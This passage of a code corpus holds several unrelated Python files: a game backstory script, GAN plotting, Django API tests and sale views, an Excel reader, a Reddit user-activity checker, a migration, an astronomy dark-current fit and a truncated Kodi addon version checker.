ALERT.')\n\t\twait(0.75)\n\t\tprint('BLACK ALERT.')\n\t\twait(0.75)\n\t\tprint('BLACK ALERT.')\n\t\twait(7)\n\n\t\tsysShell(\"reset\")\n\t\tprint('Ugh.')\n\t\twait(4)\n\t\tprint('Your head hurts.')\n\t\twait(2)\n\t\tprint('You have no idea where you are.')\n\t\twait(2)\n\t\tprint('More importantly, you have no idea who you are.')\n\t\twait(2)\n\t\tprint('You know something happened, but you\\'re not sure what.')\n\t\twait(3)\n\t\tprint('Judging by your headache - and lack of memory - it probably wasn\\'t great.')\n\t\twait(3)\n\t\tprint('Apart from that, you are in fairly good shape. You are not hungry, and you are unhurt.')\n\t\twait(3)\n\t\tprint('You are wearing a t-shirt (is that what it\\'s called?) that reads \"NASA - Temporal Research Dept.\"')\n\t\twait(4)\n\t\tprint(\"Phew. At least you can still read. 
What that text means, however, is a mystery.\")\n\n\t\twait(7)\n\tsysShell(\"reset\")","sub_path":"game/backstory.py","file_name":"backstory.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506249158","text":"from parser import argparser\nimport torch\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nargs = argparser()\nargs = vars(args)\ntitle_dict = ('Train-ACC', 'Test-ACC')\ntitle_dict1 = ('Train-G_loss', 'Train-D_loss')\n\n\ndef plot_curve(x, data, title_dict, title='', ylabel='Accuracy'):\n figure, ax = plt.subplots()\n plots = ax.plot(x, data, label='')\n figure.set_size_inches(8, 4)\n ax.legend(plots, title_dict, loc='best',\n framealpha=0.25, prop={'size': 'small', 'family': 'monospace'})\n ax.set_title(title)\n ax.set_xlabel('Epoch')\n ax.set_ylabel(ylabel)\n ax.grid(True)\n figure.tight_layout()\n # plt.show()\n plt.savefig(f'{title}_curve.png')\n\n\nif os.path.isfile(args['resume']):\n checkpoint = torch.load(args['resume'])\n trian_acc_list = checkpoint['TrainAcc_list']\n test_acc_list = checkpoint['TestAcc_list']\n\n gloss_list = checkpoint['Gloss_list']\n dloss_list = checkpoint['Dloss_list']\n print(checkpoint['epoch'])\n print(checkpoint['best_acc'])\n\n trian_acc_list = np.array(trian_acc_list, dtype=np.float)\n trian_acc_list = trian_acc_list.reshape(1, -1)\n test_acc_list = np.array(test_acc_list, dtype=np.float)\n test_acc_list = test_acc_list.reshape(1, -1)\n\n gloss_list = np.array(gloss_list, dtype=np.float)\n gloss_list = gloss_list.reshape(1, -1)\n\n dloss_list = np.array(dloss_list, dtype=np.float)\n dloss_list = dloss_list.reshape(1, -1)\n\n x = np.arange(checkpoint['epoch'])\n print(trian_acc_list.shape)\n print(trian_acc_list.shape)\n y = np.concatenate((trian_acc_list, test_acc_list), 0)\n y = y.transpose(1, 0)\n y1 = np.concatenate((gloss_list, dloss_list))\n y1 = y1.transpose(1, 0)\n print(y.shape)\n plot_curve(x, y, title_dict, 'Accuracy')\n plot_curve(x, y1, title_dict1, 'Loss', 'Loss')\n","sub_path":"lab5_Conditional_GANs/plot_figure.py","file_name":"plot_figure.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"511031485","text":"from django.utils import timezone\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom oauth2_provider.backends import UserModel\nfrom oauth2_provider.models import Application, AccessToken\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom api.models import Location, Conference\nfrom api.serializers import LocationSerializer, ConferenceSerializer\nimport datetime\n\n\nclass AuthenticatedRestTest(TestCase):\n\n def _create_authorization_header(self, token=None):\n return \"Bearer {0}\".format(token or self.access_token.token)\n\n def setup_client(self):\n self.test_user = UserModel.objects.create_user(\"test_user\", \"test@user.com\", \"123456\")\n\n self.application = Application(\n name=\"Test Application\",\n redirect_uris=\"http://localhost\",\n user=self.test_user,\n client_type=Application.CLIENT_CONFIDENTIAL,\n authorization_grant_type=Application.GRANT_AUTHORIZATION_CODE,\n )\n self.application.save()\n\n self.tok = AccessToken.objects.create(\n user=self.test_user, token='1234567890',\n application=self.application, scope='read write',\n expires=timezone.now() + datetime.timedelta(days=1)\n )\n\n self.client = 
APIClient(enforce_csrf_checks=True)\n auth = self._create_authorization_header(self.tok)\n self.client.credentials(HTTP_AUTHORIZATION=auth)\n\n def create_location(self):\n location = Location(\n title=\"My Location\",\n description=\"my description\",\n address_1=\"1 The Street\",\n address_town=\"town\",\n zipcode=\"SL4 4RE\"\n )\n\n location.save()\n return location\n\n def create_conference(self):\n\n conference = Conference(\n title='My conference',\n description='conference description',\n organiser='Fred Smith',\n location=self.location,\n start_datetime=timezone.now(),\n end_datetime=timezone.now()\n )\n\n conference.save()\n return conference\n\n\nclass LocationTests(AuthenticatedRestTest):\n\n def setUp(self):\n self.setup_client()\n\n self.test_data = dict(\n title='My Location',\n description='my description',\n address_1='1 The Street',\n address_town='town',\n zipcode='SL4 4RE'\n )\n\n def test_get_locations(self):\n self.create_location()\n url = reverse('location-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['title'], 'My Location', 'Correct location title')\n\n def test_get_location(self):\n location = self.create_location()\n url = reverse('location-detail', args=[location.id])\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'My Location')\n\n def test_add_location_returns_id(self):\n response = self.client.post(reverse('location-list'), self.test_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED,\n 'API Response tells the client the object was created')\n self.assertIsNotNone(response.data['id'],\n 'Confirm that a new ID was returned for the created object')\n\n def test_add_location_stores_data_in_db(self):\n response = self.client.post(reverse('location-list'), self.test_data, format='json')\n location = Location.objects.get(pk=response.data['id'])\n\n self.assertEqual(location.title, response.data['title'],\n 'Confirm that the location was added to the database and has the title')\n\n def test_update_location_returns_response(self):\n location = self.create_location()\n data = LocationSerializer(location).data\n data.update({'title': 'Changed'})\n\n response = self.client.put(reverse('location-detail', args=[location.id]), data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'Changed', 'Correct location title')\n\n def test_update_location_updates_db(self):\n location = self.create_location()\n data = LocationSerializer(location).data\n data.update({'title': 'Changed'})\n self.client.put(reverse('location-detail', args=[location.id]), data, format='json')\n\n updated_location = Location.objects.get(pk=location.id)\n self.assertEqual(updated_location.title, 'Changed')\n\n def test_delete_location_returns_response(self):\n location = self.create_location()\n response = self.client.delete(reverse('location-detail', args=[location.id]))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_location_updates_db(self):\n location = self.create_location()\n self.client.delete(reverse('location-detail', args=[location.id]))\n locations = Location.objects.filter(pk=location.id)\n self.assertEqual(len(locations), 0, 'Confirm it\\'s not there')\n\n\nclass ConferenceTests(AuthenticatedRestTest):\n\n def 
setUp(self):\n self.setup_client()\n\n self.location = self.create_location()\n self.test_data = dict(\n title='My conference',\n description='conference description',\n organiser='Fred Smith',\n location=self.location.id,\n start_datetime=timezone.now(),\n end_datetime=timezone.now()\n )\n\n def test_get_conferences(self):\n self.create_conference()\n url = reverse('conference-list')\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 1)\n self.assertEqual(response.data[0]['title'], 'My conference', 'Correct conference title')\n\n def test_get_conference(self):\n conference = self.create_conference()\n url = reverse('conference-detail', args=[conference.id])\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'My conference')\n\n def test_add_conference_returns_id(self):\n response = self.client.post(reverse('conference-list'), self.test_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED,\n 'API Response tells the client the object was created')\n self.assertIsNotNone(response.data['id'],\n 'Confirm that a new ID was returned for the created object')\n\n def test_add_conference_stores_data_in_db(self):\n response = self.client.post(reverse('conference-list'), self.test_data, format='json')\n conference = Conference.objects.get(pk=response.data['id'])\n\n self.assertEqual(conference.title, response.data['title'],\n 'Confirm that the location was added to the database and has the title')\n\n def test_update_conference_returns_response(self):\n conference = self.create_conference()\n data = ConferenceSerializer(conference).data\n data.update({'title': 'Changed'})\n\n response = self.client.put(reverse('conference-detail', args=[conference.id]), data, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['title'], 'Changed', 'Correct conference title')\n\n def test_update_conference_updates_db(self):\n conference = self.create_conference()\n data = ConferenceSerializer(conference).data\n data.update({'title': 'Changed'})\n self.client.put(reverse('conference-detail', args=[conference.id]), data, format='json')\n\n updated_conference = Conference.objects.get(pk=conference.id)\n self.assertEqual(updated_conference.title, 'Changed')\n\n def test_delete_conference_returns_response(self):\n conference = self.create_conference()\n response = self.client.delete(reverse('conference-detail', args=[conference.id]))\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_delete_conference_updates_db(self):\n conference = self.create_conference()\n self.client.delete(reverse('conference-detail', args=[conference.id]))\n conferences = Conference.objects.filter(pk=conference.id)\n self.assertEqual(len(conferences), 0, 'Confirm it\\'s not there')\n","sub_path":"api/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"41223168","text":"import json\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db import transaction\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom core.erp.forms import 
SaleForm,ClientForm\nfrom core.erp.mixins import ValidatePermissionRequiredMixin\nfrom django.views.generic import CreateView, ListView, DeleteView, View\n\nfrom core.erp.models import Sale, Product, DetSale, company, Client, Mesa\n\nimport os\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom xhtml2pdf import pisa\nfrom django.contrib.staticfiles import finders\nfrom crum import get_current_user\n\n\nclass SaleListView(LoginRequiredMixin, ValidatePermissionRequiredMixin, ListView):\n model = Sale\n template_name = 'sale/list.html'\n permission_required = 'view_sale'\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'searchdata':\n data = []\n for i in Sale.objects.all().filter(user_creation_id=get_current_user()):\n data.append(i.toJSON())\n elif action == 'search_details_prod':\n data = []\n for i in DetSale.objects.filter(sale_id=request.POST['id']):\n data.append(i.toJSON())\n else:\n data['error'] = 'Ha ocurrido un error'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Listado de Ventas'\n context['list_url'] = reverse_lazy('erp:sale_list')\n context['entity'] = 'Ventas'\n return context\nclass SaleCreateView(LoginRequiredMixin, ValidatePermissionRequiredMixin, CreateView):\n model = Sale\n form_class = SaleForm\n template_name = 'sale/create.html'\n success_url = reverse_lazy('erp:dashboard')\n permission_required = 'add_sale'\n url_redirect = success_url\n\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n action = request.POST['action']\n if action == 'search_products':\n data = []\n #conv a lista con loads\n ids_exculde= json.loads(request.POST['ids'])\n term = request.POST['term'].strip()\n products = Product.objects.filter(stock__gt=0, user_creation_id=get_current_user())\n if len(term):\n products = products.filter(name__icontains=term)\n for i in products.exclude(id__in=ids_exculde)[0:10]:\n item = i.toJSON()\n item['value'] = i.name\n #item['text'] = i.name\n data.append(item)\n elif action == 'search_autocomplete':\n data = []\n #conv a lista con loads\n ids_exculde= json.loads(request.POST['ids'])\n \n term = request.POST['term'].strip()\n data.append({'id':term, 'text': term})\n products = Product.objects.filter(name__icontains=term, stock__gt=0, user_creation_id=get_current_user())\n #in que mande rangos \n for i in products.exclude(id__in=ids_exculde)[0:10]:\n item = i.toJSON()\n item['text'] = i.name\n data.append(item)\n elif action == 'add':\n with transaction.atomic():\n vents = json.loads(request.POST['vents'])\n sale = Sale()\n sale.date_joined = vents['date_joined']\n sale.cli_id = vents['cli']\n sale.tables_id = vents['tables']\n sale.subtotal = float(vents['subtotal'])\n sale.iva = float(vents['iva'])\n sale.total = float(vents['total'])\n sale.pagorecibio = float(vents['pagorecibio'])\n sale.pagocambio = float(vents['pagocambio'])\n sale.save()\n for i in vents['products']:\n det = DetSale()\n det.sale_id = sale.id\n det.prod_id = i['id']\n det.cant = 
int(i['cant'])\n det.price = float(i['pvp'])\n det.subtotal = float(i['subtotal'])\n det.save()\n #stock se disminuya de input cantidad\n det.prod.stock -= det.cant\n det.prod.save()\n data ={'id': sale.id}\n elif action == 'search_clients':\n data = []\n term = request.POST['term']\n clients = Client.objects.filter(Q(names__icontains=term) | Q(surnames__icontains=term) | Q(phone__icontains=term), user_creation_id=get_current_user())[0:10]\n for i in clients:\n item = i.toJSON()\n item['text'] = i.get_full_name()\n data.append(item)\n elif action == 'create_client':\n with transaction.atomic():\n frmClient = ClientForm(request.POST)\n data = frmClient.save()\n else:\n data['error'] = 'No ha ingresado a ninguna opción'\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data, safe=False)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Creación de una Venta'\n context['entity'] = 'Ventas'\n context['list_url'] = self.success_url\n context['action'] = 'add'\n context['frmClient'] = ClientForm()\n return context\n\n\nclass SaleDeleteView(LoginRequiredMixin, ValidatePermissionRequiredMixin, DeleteView):\n model = Sale\n template_name = 'sale/delete.html'\n success_url = reverse_lazy('erp:sale_list')\n permission_required = 'delete_sale'\n url_redirect = success_url\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n return super().dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = {}\n try:\n self.object.delete()\n except Exception as e:\n data['error'] = str(e)\n return JsonResponse(data)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['title'] = 'Eliminación de una Venta'\n context['entity'] = 'Ventas'\n context['list_url'] = self.success_url\n return context\n\n\nclass SaleinvoicePdfView(View):\n\n def link_callback(self, uri, rel):\n \"\"\"\n Convert HTML URIs to absolute system paths so xhtml2pdf can access those\n resources\n \"\"\"\n # use short variable names\n sUrl = settings.STATIC_URL # Typically /static/\n sRoot = settings.STATIC_ROOT # Typically /home/userX/project_static/\n mUrl = settings.MEDIA_URL # Typically /static/media/\n mRoot = settings.MEDIA_ROOT # Typically /home/userX/project_static/media/\n\n # convert URIs to absolute system paths\n if uri.startswith(mUrl):\n path = os.path.join(mRoot, uri.replace(mUrl, \"\"))\n elif uri.startswith(sUrl):\n path = os.path.join(sRoot, uri.replace(sUrl, \"\"))\n else:\n return uri # handle absolute uri (ie: http://some.tld/foo.png)\n\n # asegúrese de que el archivo exista\n if not os.path.isfile(path):\n raise Exception(\n 'media URI must start with %s or %s' % (sUrl, mUrl)\n )\n return path\n\n def get(self, request, *args, **kwargs):\n try:\n template = get_template('sale/invoice.html')\n context = {\n 'sale': Sale.objects.get(pk=self.kwargs['pk']),\n 'comp': company.objects.get(user_creation_id=get_current_user()),\n 'icon': '{}{}'.format(settings.STATIC_URL, 'img/logos.png')\n }\n\n html = template.render(context)\n response = HttpResponse(content_type='application/pdf')\n #linea para que se descargue el pdf\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\n pisaStatus = pisa.CreatePDF(\n html, dest=response,\n link_callback=self.link_callback\n )\n \n return response\n except:\n pass\n return HttpResponseRedirect(reverse_lazy('erp:sale_list'))\n\n","sub_path":"proyecto 
python/app/core/erp/views/sale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"628100312","text":"from __future__ import division\nimport openpyxl\nimport xlrd\nimport datetime\nimport trollius\nfrom trollius import tasks\nfrom openpyxl.utils import coordinate_from_string, column_index_from_string\n\n\nclass __obj__(object):\n pass\nt1= datetime.datetime.now()\nfx = xlrd.open_workbook(\"/home/hcsadmin/q03/xls/a001.xlsx\")\ncols_2 = []\nfor k,v in fx.name_and_scope_map.items():\n col = __obj__()\n col.name = v.name\n col.address = v.formula_text\n col.cell_letter = v.formula_text.split('!')[1].split(':')[0].split('$')[1]\n col.index = column_index_from_string(col.cell_letter)\n cols_2.append(col)\ndata_sheet_2 = [x for x in fx.sheets() if x.name == \"data\"][0]\ndata =[]\ndef get_row():\n @trollius.coroutine\n def get_cell(x,y):\n cell = data_sheet_2.cell(x,y)\n if cell.data_type == 1:\n return cell.value\n if cell.data_type == 2:\n return cell.value\n if cell.data_type == 3:\n return datetime.datetime(*xlrd.xldate_as_tuple(cell.value, fx.datemode))\n\n ret = []\n @tasks.coroutine\n def create_row(row):\n for i in range(0,data_sheet_2.ncols):\n ret.append(get_cell(row,i))\n return ret\n @trollius.coroutine\n def fetch():\n for row in range(1, data_sheet_2.nrows):\n yield create_row(data_sheet_2.row(row))\n loop =trollius.get_event_loop()\n loop.run_until_complete(fetch())\n return fetch()\nt2 = datetime.datetime.now()\nn2= (t2 - t1).microseconds\nt1= datetime.datetime.now()\n# wb=openpyxl.load_workbook(\"/home/hcsadmin/q03/xls/a001.xlsx\")\n# cols_1 =[]\n# for x in wb.defined_names.definedName:\n#\n# if hasattr(x, \"name\") and x.value != 'data!#REF!':\n# item = __obj__()\n# item.address = x.value\n# item.name = x.name\n# item.col = column_index_from_string(x.value.split(\"!\")[1].split(\":\")[0].replace(\"$\", \"\")) - 1\n# cols_1.append(item)\n# data_sheet_1 = wb.get_sheet_by_name(\"data\")\n# t2 = datetime.datetime.now()\n# n1= (t2 - t1).microseconds\n# wb.close()\n# get_row_time_1 = datetime.datetime.now()\n# list(data_sheet_1.rows)\n# get_row_time_1 = (datetime.datetime.now()-get_row_time_1).microseconds\n#\n# get_row_time_2 = datetime.datetime.now()\n# list(get_row())\n# get_row_time_2 = (datetime.datetime.now()-get_row_time_2).microseconds\n\n\n\n","sub_path":"test_read_excel.py","file_name":"test_read_excel.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"140870492","text":"#!/usr/bin/python3\n\n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. 
See\n# http://www.wtfpl.net/ for more details.\n#\n# @author C0ldSn4p\n\nimport requests\nfrom requests.auth import HTTPBasicAuth\nimport json \nimport time\nimport os.path\n\n\n#####################\n### Inputs & Conf ###\n#####################\n\n# local configuration with secret key, see secret_key_empty\n# Will need history access\nfrom generatedSetup.configuration import conf\n\ntimestamp_cutoff = 1598918400 # timestamp cutoff for old account, here 2020-09-01\n\n# start position in the list (usefull to resume), if 0 will reset the output files\nstartPos = 0\nstopPos = 30000 #stop at this position (usefull to process in batch)\n\n# list of users to test, contains a list users with username in the form \"users = [...]\"\nfrom inputList import users\n# users = ['C0ldSn4p', 'Antitout'] #example\n\n# output file name, will overwrite\noutputPath = \"results\"\noutputActiveFile = \"active.txt\"\noutputOldFile = \"old.txt\"\noutputDeadFile = \"dead.txt\"\noutputBugFile = \"bug.txt\"\n\n\n\n########################\n### Helper Functions ###\n########################\n\ndef getLatestTimestamp(response_text):\n try:\n jsonData = json.loads(response_text)\n if 'data' not in jsonData:\n return -1\n data = jsonData['data']\n most_recent = data['children'][0]\n timestamp = most_recent['data']['created_utc']\n return timestamp\n except:\n return -2\n\n\ndef waitIfNeeded(response):\n try:\n headers = response.headers\n ratelimitRemaining = float(headers[\"x-ratelimit-remaining\"])\n ratelimitReset = float(headers[\"x-ratelimit-reset\"])\n if ratelimitRemaining < 10:\n print(\"WARNING: ratelimit close, sleep for \"+str(ratelimitReset)+\"s\")\n time.sleep(ratelimitReset)\n except:\n print(\"ERROR reading ratelimit, wait 300s\")\n time.sleep(300)\n\n\n\n\n####################\n###### Set Up ######\n####################\n\n# Set user agent\nheaders = requests.utils.default_headers()\nheaders.update({'User-Agent': conf['user_agent']})\n\n# Auth and get token\nauth=HTTPBasicAuth(conf['auth_id'], conf['auth_secret'])\nurl = 'https://www.reddit.com/api/v1/access_token'\ndata = {'grant_type': 'refresh_token', 'refresh_token': conf['refresh_token']}\nx = requests.post(url, data = data, auth = auth, headers = headers)\nresponse = json.loads(x.text)\naccess_token = response['access_token']\n\n# update header\nheaders.update({'Authorization': 'bearer '+access_token})\nprint(\"token refreshed: \"+x.text)\n\n\n###################\n#### Main loop ####\n###################\n\n\ntotal_str = str(len(users))\n\nurlbase = 'https://oauth.reddit.com/user/'\n\n\nif startPos == 0:\n with open(os.path.join(outputPath,outputActiveFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputOldFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputDeadFile),'w') as file:\n file.write(\"\")\n with open(os.path.join(outputPath,outputBugFile),'w') as file:\n file.write(\"\")\n\n\nactiveFile = open(os.path.join(outputPath,outputActiveFile),'a')\noldFile = open(os.path.join(outputPath,outputOldFile),'a')\ndeadFile = open(os.path.join(outputPath,outputDeadFile),'a')\nbugFile = open(os.path.join(outputPath,outputBugFile),'a')\n\n\nactive = 0\nold = 0\ndead = 0\nbug = 0\n\nfor i in range(startPos,min(stopPos,len(users))):\n user = users[i]\n x = None\n while x == None:\n try:\n x = requests.get(urlbase+user, headers = headers, timeout=10)\n except requests.Timeout:\n print(\"TIMEOUT, retry\")\n x = None\n timestamp = getLatestTimestamp(x.text)\n outstring = str(i).rjust(len(total_str), 
'0')+\"/\"+total_str+\": \"+user+\" | \"\n if(timestamp == -2):\n outstring+=\"BUG\"\n bugFile.write('\"'+user+'\",\\n')\n bug += 1\n elif(timestamp == -1):\n outstring+=\"DEAD\"\n deadFile.write('\"'+user+'\",\\n')\n dead += 1\n elif(timestamp < timestamp_cutoff):\n outstring+=\"OLD\"\n oldFile.write('\"'+user+'\",\\n')\n old += 1\n else:\n outstring+=\"Active\"\n activeFile.write('\"'+user+'\",\\n')\n active += 1\n print(outstring)\n waitIfNeeded(x) # prevent too many request\n\n\nactiveFile.close()\noldFile.close()\ndeadFile.close()\nbugFile.close()\n\nprint(str(active)+\" active accounts\")\nprint(str(old)+\" old accounts\")\nprint(str(dead)+\" dead accounts\")\nprint(str(bug)+\" bug accounts\")","sub_path":"activeUserTest/1_activeUserTest.py","file_name":"1_activeUserTest.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"634713760","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0013_auto_20160511_0649'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='booking',\n name='is_survey_done',\n ),\n migrations.AlterField(\n model_name='booking',\n name='date_for_survey',\n field=models.DateField(default=datetime.date(2016, 5, 25)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='booking',\n name='date_of_moving',\n field=models.DateField(default=datetime.datetime(2016, 5, 25, 18, 17, 58, 682684)),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='booking',\n name='status',\n field=models.IntegerField(default=3, choices=[(0, b'Completed'), (1, b'Cancelled'), (2, b'Accepted'), (3, b'Received'), (4, b'Survey Done')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"app/migrations/0014_auto_20160525_1817.py","file_name":"0014_auto_20160525_1817.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"298792569","text":"from astropy.io import fits\r\nimport matplotlib.pyplot as plt\r\nimport numpy\r\nfrom scipy import stats\r\nfrom math import log, sqrt, e\r\n\r\nfiles = []\r\nfor i in range(1, 6+1):\r\n files.append(\"qf15_obs5_dark\"+str(i)+\".Combined.fit\")\r\n\r\nim1 = fits.getdata(files[0])\r\nim2 = fits.getdata(files[1])\r\nim3 = fits.getdata(files[2])\r\nim4 = fits.getdata(files[3])\r\nim5 = fits.getdata(files[4])\r\nim6 = fits.getdata(files[5])\r\n\r\nk = 1.38*10**(-23) #Boltzmann's constant\r\n##lnDe0Matrix = numpy.zeros(shape = (len(im1),len(im1[0]))) \r\n##deltaEMatrix = numpy.zeros(shape = (len(im1),len(im1[0])))\r\nlnDe0Matrix = []\r\ndeltaEMatrix = []\r\nDarkCurrs = []\r\nnegSlopes = []\r\nintercepts = []\r\nx = [1/(273+19),\r\n 1/(273+14),\r\n 1/(273+9),\r\n 1/(273+4),\r\n 1/(273-1),\r\n 1/(273-6)]\r\nfor r in range(len(im1)):\r\n if r%10 == 0:\r\n print(r)\r\n for c in range(len(im1[0])):\r\n Deinpix = []\r\n ##sumDe0 = 0\r\n ##sumDe0 += im1[r][c]\r\n Deinpix.append(im1[r][c])\r\n ##sumDe0 += im2[r][c]\r\n Deinpix.append(im2[r][c])\r\n ##sumDe0 += im3[r][c]\r\n Deinpix.append(im3[r][c])\r\n ##sumDe0 += im4[r][c]\r\n Deinpix.append(im4[r][c])\r\n ##sumDe0 += im5[r][c]\r\n Deinpix.append(im5[r][c])\r\n ##sumDe0 += im6[r][c]\r\n Deinpix.append(im6[r][c])\r\n\r\n slope, intercept, r_value, p_value, std_err = stats.linregress(x, Deinpix)\r\n negSlopes.append(-slope)\r\n 
intercepts.append(intercept)\r\n\r\n deltaE = -1*slope*k\r\n lnDe0 = intercept\r\n\r\n ##lnDe0Matrix[r][c] = lnDe0\r\n ##deltaEMatrix[r][c] = deltaE\r\n lnDe0Matrix.append(lnDe0)\r\n deltaEMatrix.append(deltaE)\r\n\r\nslope, intercept, r_value, p_value, std_err = stats.linregress(deltaEMatrix, lnDe0Matrix)\r\n\r\nEmn = 1/slope\r\n\r\nTmn = Emn/k\r\nprint(Tmn)\r\n\r\nslope, intercept, r_value, p_value, std_err = stats.linregress(negSlopes, intercepts)\r\nplt.plot(negSlopes, intercepts, \"ro\", markersize=1)\r\nx = numpy.linspace(x[0], x[-1], 100000)\r\ny = slope*x+intercept\r\nplt.plot(x, y, linestyle = \"-\", label = \"Fit line\", linewidth = 1)\r\nplt.title(\"Cloudy Night 2: Pixel Line Intercepts vs Slopes\")\r\nplt.ylabel(\"Intercepts\")\r\nplt.xlabel(\"Slopes\")\r\nplt.show()\r\n","sub_path":"Observations/July 07 2019/Trimmed/isokinetic_temp.py","file_name":"isokinetic_temp.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"23458116","text":"# -*- coding: utf-8 -*-\n\nimport xbmc\nimport urllib2\nimport xbmcaddon\nimport urllib\nimport os\nimport inspect\nfrom distutils.version import LooseVersion\n\ntry:\n from koding import Notify\nexcept Exception as e:\n print(e)\n\n\ndef caller_name():\n frame=inspect.currentframe()\n frame=frame.f_back.f_back\n code=frame.f_code\n return code.co_filename\n\ndef Log(*args, **kwargs):\n message = ''\n if len(args) > 1:\n for a in args:\n message += str(a) + \" - \"\n else:\n for a in args:\n message = str(a)\n frame = inspect.currentframe().f_back\n line = \"\"\n func = \"\"\n caller_mod = caller_name()\n if '\\\\' in caller_mod:\n try: caller = caller_mod.rsplit('\\\\', 1)[1]\n except: caller = caller_mod\n else:\n try: caller = caller_mod.rsplit('/', 1)[1]\n except: caller = caller_mod\n showFunc = kwargs.get('showFunc', True)\n if showFunc:\n func = str(inspect.getframeinfo(frame)[2])\n showLine = kwargs.get('showLine', True)\n if showLine:\n line = \"Line \" + str(frame.f_lineno)\n line = \"[{}]\".format(line)\n caller = caller.split(\".py\")[0]\n info = \"TGSERVICE [{}.{}]\".format(caller, func) + \" - \" + line + ' - '\n xbmc.log(info + message, 2)\n\n\ndef url_exists(url):\n request = urllib2.Request(url)\n request.get_method = lambda: 'HEAD'\n try:\n urllib2.urlopen(request)\n Log(\"Url is good: {}\".format(url))\n return True\n except:\n try:\n Notify(title='[COLORlimegreen]Hub[/COLOR]', message=\"Unable to reach {}\".format(url), duration=2000)\n except Exception as e:\n print(e)\n Log(\"Unable to reach: {}\".format(url))\n return False\n\n#### Addon Update Check ######\n\ndef check_addon_latest_ver(addonID, repo_addonsfile_url):\n addonline = 'addon id=\"%s\"' % (addonID)\n saved = xbmc.translatePath(\"special://home/userdata/repoaddonsfile.txt\")\n if not url_exists(repo_addonsfile_url):\n return False\n urllib.urlretrieve(repo_addonsfile_url, saved)\n if os.path.exists(saved):\n with open(saved) as f:\n content = f.readlines()\n for line in content:\n line = line.strip('\\n')\n line = line.strip('\\r')\n if addonline in line:\n prever = line.split('version=\"', 1)[1]\n ver = prever.split('\" provider', 1)[0]\n f.close()\n try:\n os.remove(saved)\n except:\n pass\n return ver\n else:\n print (\"################# check_addon_latest_ver(): path 'saved' doesn't exist. 
